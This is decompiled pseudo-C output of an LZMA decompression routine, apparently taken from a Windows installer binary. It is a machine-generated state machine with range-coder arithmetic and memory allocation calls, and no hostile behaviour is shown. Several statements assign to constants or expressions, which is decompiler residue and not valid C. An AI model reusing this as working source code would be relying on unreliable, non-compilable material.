                                            				signed int _t539;
                                            				unsigned short _t569;
                                            				signed int _t579;
                                            				signed int _t607;
                                            				void* _t627;
                                            				signed int _t628;
                                            				signed int _t635;
                                            				signed int* _t643;
                                            				void* _t644;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					_t530 =  *(_t644 - 0x30);
                                            					if(_t530 >= 4) {
                                            					}
                                            					 *(_t644 - 0x40) = 6;
                                            					 *(_t644 - 0x7c) = 0x19;
                                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                            					while(1) {
                                            						L145:
                                            						 *(_t644 - 0x50) = 1;
                                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                            						while(1) {
                                            							L149:
                                            							if( *(_t644 - 0x48) <= 0) {
                                            								goto L155;
                                            							}
                                            							L150:
                                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                            							 *(_t644 - 0x54) = _t643;
                                            							_t569 =  *_t643;
                                            							_t635 = _t569 & 0x0000ffff;
                                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                            							if( *(_t644 - 0xc) >= _t607) {
                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                            								_t628 = _t627 + 1;
                                            								 *_t643 = _t569 - (_t569 >> 5);
                                            								 *(_t644 - 0x50) = _t628;
                                            							} else {
                                            								 *(_t644 - 0x10) = _t607;
                                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                            							}
                                            							if( *(_t644 - 0x10) >= 0x1000000) {
                                            								L148:
                                            								_t487 = _t644 - 0x48;
                                            								 *_t487 =  *(_t644 - 0x48) - 1;
                                            								L149:
                                            								if( *(_t644 - 0x48) <= 0) {
                                            									goto L155;
                                            								}
                                            								goto L150;
                                            							} else {
                                            								L154:
                                            								L146:
                                            								if( *(_t644 - 0x6c) == 0) {
                                            									L169:
                                            									 *(_t644 - 0x88) = 0x18;
                                            									L170:
                                            									_t579 = 0x22;
                                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                            									_t539 = 0;
                                            									L172:
                                            									return _t539;
                                            								}
                                            								L147:
                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            								_t484 = _t644 - 0x70;
                                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                            								goto L148;
                                            							}
                                            							L155:
                                            							_t537 =  *(_t644 - 0x7c);
                                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                            							while(1) {
                                            								L140:
                                            								 *(_t644 - 0x88) = _t537;
                                            								while(1) {
                                            									L1:
                                            									_t538 =  *(_t644 - 0x88);
                                            									if(_t538 > 0x1c) {
                                            										break;
                                            									}
                                            									L2:
                                            									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                            										case 0:
                                            											L3:
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												goto L170;
                                            											}
                                            											L4:
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                            											_t538 =  *( *(_t644 - 0x70));
                                            											if(_t538 > 0xe1) {
                                            												goto L171;
                                            											}
                                            											L5:
                                            											_t542 = _t538 & 0x000000ff;
                                            											_push(0x2d);
                                            											asm("cdq");
                                            											_pop(_t581);
                                            											_push(9);
                                            											_pop(_t582);
                                            											_t638 = _t542 / _t581;
                                            											_t544 = _t542 % _t581 & 0x000000ff;
                                            											asm("cdq");
                                            											_t633 = _t544 % _t582 & 0x000000ff;
                                            											 *(_t644 - 0x3c) = _t633;
                                            											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                            											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                            											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                            											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                            												L10:
                                            												if(_t641 == 0) {
                                            													L12:
                                            													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                            													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                            													goto L15;
                                            												} else {
                                            													goto L11;
                                            												}
                                            												do {
                                            													L11:
                                            													_t641 = _t641 - 1;
                                            													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                            												} while (_t641 != 0);
                                            												goto L12;
                                            											}
                                            											L6:
                                            											if( *(_t644 - 4) != 0) {
                                            												GlobalFree( *(_t644 - 4));
                                            											}
                                            											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                            											 *(_t644 - 4) = _t538;
                                            											if(_t538 == 0) {
                                            												goto L171;
                                            											} else {
                                            												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                            												goto L10;
                                            											}
                                            										case 1:
                                            											L13:
                                            											__eflags =  *(_t644 - 0x6c);
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												L157:
                                            												 *(_t644 - 0x88) = 1;
                                            												goto L170;
                                            											}
                                            											L14:
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                            											_t45 = _t644 - 0x48;
                                            											 *_t45 =  *(_t644 - 0x48) + 1;
                                            											__eflags =  *_t45;
                                            											L15:
                                            											if( *(_t644 - 0x48) < 4) {
                                            												goto L13;
                                            											}
                                            											L16:
                                            											_t550 =  *(_t644 - 0x40);
                                            											if(_t550 ==  *(_t644 - 0x74)) {
                                            												L20:
                                            												 *(_t644 - 0x48) = 5;
                                            												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                            												goto L23;
                                            											}
                                            											L17:
                                            											 *(_t644 - 0x74) = _t550;
                                            											if( *(_t644 - 8) != 0) {
                                            												GlobalFree( *(_t644 - 8));
                                            											}
                                            											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                            											 *(_t644 - 8) = _t538;
                                            											if(_t538 == 0) {
                                            												goto L171;
                                            											} else {
                                            												goto L20;
                                            											}
                                            										case 2:
                                            											L24:
                                            											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                            											 *(_t644 - 0x84) = 6;
                                            											 *(_t644 - 0x4c) = _t557;
                                            											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                            											goto L132;
                                            										case 3:
                                            											L21:
                                            											__eflags =  *(_t644 - 0x6c);
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												L158:
                                            												 *(_t644 - 0x88) = 3;
                                            												goto L170;
                                            											}
                                            											L22:
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											_t67 = _t644 - 0x70;
                                            											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                            											__eflags =  *_t67;
                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                            											L23:
                                            											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                            											if( *(_t644 - 0x48) != 0) {
                                            												goto L21;
                                            											}
                                            											goto L24;
                                            										case 4:
                                            											L133:
                                            											_t559 =  *_t642;
                                            											_t626 = _t559 & 0x0000ffff;
                                            											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                            											if( *(_t644 - 0xc) >= _t596) {
                                            												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                            												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                            												 *(_t644 - 0x40) = 1;
                                            												_t560 = _t559 - (_t559 >> 5);
                                            												__eflags = _t560;
                                            												 *_t642 = _t560;
                                            											} else {
                                            												 *(_t644 - 0x10) = _t596;
                                            												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                            												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                            											}
                                            											if( *(_t644 - 0x10) >= 0x1000000) {
                                            												goto L139;
                                            											} else {
                                            												goto L137;
                                            											}
                                            										case 5:
                                            											L137:
                                            											if( *(_t644 - 0x6c) == 0) {
                                            												L168:
                                            												 *(_t644 - 0x88) = 5;
                                            												goto L170;
                                            											}
                                            											L138:
                                            											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                            											L139:
                                            											_t537 =  *(_t644 - 0x84);
                                            											L140:
                                            											 *(_t644 - 0x88) = _t537;
                                            											goto L1;
                                            										case 6:
                                            											L25:
                                            											__edx = 0;
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L36:
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) = 1;
                                            												 *(__ebp - 0x84) = 7;
                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											L26:
                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            											__esi =  *(__ebp - 0x60);
                                            											__cl = 8;
                                            											__cl = 8 -  *(__ebp - 0x3c);
                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            											__ecx =  *(__ebp - 0x3c);
                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            											__ecx =  *(__ebp - 4);
                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            											__eflags =  *(__ebp - 0x38) - 4;
                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											if( *(__ebp - 0x38) >= 4) {
                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                            												if( *(__ebp - 0x38) >= 0xa) {
                                            													_t98 = __ebp - 0x38;
                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                            													__eflags =  *_t98;
                                            												} else {
                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            												}
                                            											} else {
                                            												 *(__ebp - 0x38) = 0;
                                            											}
                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                            											if( *(__ebp - 0x34) == __edx) {
                                            												L35:
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												goto L61;
                                            											} else {
                                            												L32:
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__ecx =  *(__ebp - 8);
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            												goto L41;
                                            											}
                                            										case 7:
                                            											L66:
                                            											__eflags =  *(__ebp - 0x40) - 1;
                                            											if( *(__ebp - 0x40) != 1) {
                                            												L68:
                                            												__eax =  *(__ebp - 0x24);
                                            												 *(__ebp - 0x80) = 0x16;
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												__eax =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            												__eax =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 4) + 0x664;
                                            												__eflags = __eax;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L69;
                                            											}
                                            											L67:
                                            											__eax =  *(__ebp - 4);
                                            											__ecx =  *(__ebp - 0x38);
                                            											 *(__ebp - 0x84) = 8;
                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            											goto L132;
                                            										case 8:
                                            											L70:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xa;
                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            											} else {
                                            												__eax =  *(__ebp - 0x38);
                                            												__ecx =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                            												 *(__ebp - 0x84) = 9;
                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            											}
                                            											goto L132;
                                            										case 9:
                                            											L73:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												goto L90;
                                            											}
                                            											L74:
                                            											__eflags =  *(__ebp - 0x60);
                                            											if( *(__ebp - 0x60) == 0) {
                                            												goto L171;
                                            											}
                                            											L75:
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                            											__eflags = _t259;
                                            											0 | _t259 = _t259 + _t259 + 9;
                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                            											goto L76;
                                            										case 0xa:
                                            											L82:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L84:
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xb;
                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											L83:
                                            											__eax =  *(__ebp - 0x28);
                                            											goto L89;
                                            										case 0xb:
                                            											L85:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__ecx =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x20);
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            											} else {
                                            												__eax =  *(__ebp - 0x24);
                                            											}
                                            											__ecx =  *(__ebp - 0x28);
                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            											L89:
                                            											__ecx =  *(__ebp - 0x2c);
                                            											 *(__ebp - 0x2c) = __eax;
                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            											L90:
                                            											__eax =  *(__ebp - 4);
                                            											 *(__ebp - 0x80) = 0x15;
                                            											__eax =  *(__ebp - 4) + 0xa68;
                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            											goto L69;
                                            										case 0xc:
                                            											L99:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L164:
                                            												 *(__ebp - 0x88) = 0xc;
                                            												goto L170;
                                            											}
                                            											L100:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t334 = __ebp - 0x70;
                                            											 *_t334 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t334;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											__eax =  *(__ebp - 0x2c);
                                            											goto L101;
                                            										case 0xd:
                                            											L37:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L159:
                                            												 *(__ebp - 0x88) = 0xd;
                                            												goto L170;
                                            											}
                                            											L38:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t122 = __ebp - 0x70;
                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t122;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L39:
                                            											__eax =  *(__ebp - 0x40);
                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            												goto L48;
                                            											}
                                            											L40:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												goto L54;
                                            											}
                                            											L41:
                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            											 *(__ebp - 0x48) = __eax;
                                            											__eax = __eax + 1;
                                            											__eax = __eax << 8;
                                            											__eax = __eax + __ebx;
                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edx = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												 *(__ebp - 0x40) = 1;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												__ebx = __ebx + __ebx + 1;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edx;
                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L39;
                                            											} else {
                                            												L45:
                                            												goto L37;
                                            											}
                                            										case 0xe:
                                            											L46:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L160:
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											L47:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t156 = __ebp - 0x70;
                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t156;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											while(1) {
                                            												L48:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													break;
                                            												}
                                            												L49:
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t170 = __edx + 1; // 0x1
                                            													__ebx = _t170;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													continue;
                                            												} else {
                                            													L53:
                                            													goto L46;
                                            												}
                                            											}
                                            											L54:
                                            											_t173 = __ebp - 0x34;
                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            											__eflags =  *_t173;
                                            											goto L55;
                                            										case 0xf:
                                            											L58:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L161:
                                            												 *(__ebp - 0x88) = 0xf;
                                            												goto L170;
                                            											}
                                            											L59:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t203 = __ebp - 0x70;
                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t203;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L60:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												L55:
                                            												__al =  *(__ebp - 0x44);
                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            												goto L56;
                                            											}
                                            											L61:
                                            											__eax =  *(__ebp - 0x58);
                                            											__edx = __ebx + __ebx;
                                            											__ecx =  *(__ebp - 0x10);
                                            											__esi = __edx + __eax;
                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												_t217 = __edx + 1; // 0x1
                                            												__ebx = _t217;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L60;
                                            											} else {
                                            												L65:
                                            												goto L58;
                                            											}
                                            										case 0x10:
                                            											L109:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												L165:
                                            												 *(__ebp - 0x88) = 0x10;
                                            												goto L170;
                                            											}
                                            											L110:
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t365 = __ebp - 0x70;
                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t365;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											goto L111;
                                            										case 0x11:
                                            											L69:
                                            											__esi =  *(__ebp - 0x58);
                                            											 *(__ebp - 0x84) = 0x12;
                                            											goto L132;
                                            										case 0x12:
                                            											L128:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L131:
                                            												__eax =  *(__ebp - 0x58);
                                            												 *(__ebp - 0x84) = 0x13;
                                            												__esi =  *(__ebp - 0x58) + 2;
                                            												L132:
                                            												 *(_t644 - 0x54) = _t642;
                                            												goto L133;
                                            											}
                                            											L129:
                                            											__eax =  *(__ebp - 0x4c);
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											__eflags = __eax;
                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                            											goto L130;
                                            										case 0x13:
                                            											L141:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												L143:
                                            												_t469 = __ebp - 0x58;
                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            												__eflags =  *_t469;
                                            												 *(__ebp - 0x30) = 0x10;
                                            												 *(__ebp - 0x40) = 8;
                                            												L144:
                                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                            												L145:
                                            												 *(_t644 - 0x50) = 1;
                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                            												goto L149;
                                            											}
                                            											L142:
                                            											__eax =  *(__ebp - 0x4c);
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											 *(__ebp - 0x30) = 8;
                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            											L130:
                                            											 *(__ebp - 0x58) = __eax;
                                            											 *(__ebp - 0x40) = 3;
                                            											goto L144;
                                            										case 0x14:
                                            											L156:
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            											__eax =  *(__ebp - 0x80);
                                            											while(1) {
                                            												L140:
                                            												 *(_t644 - 0x88) = _t537;
                                            												goto L1;
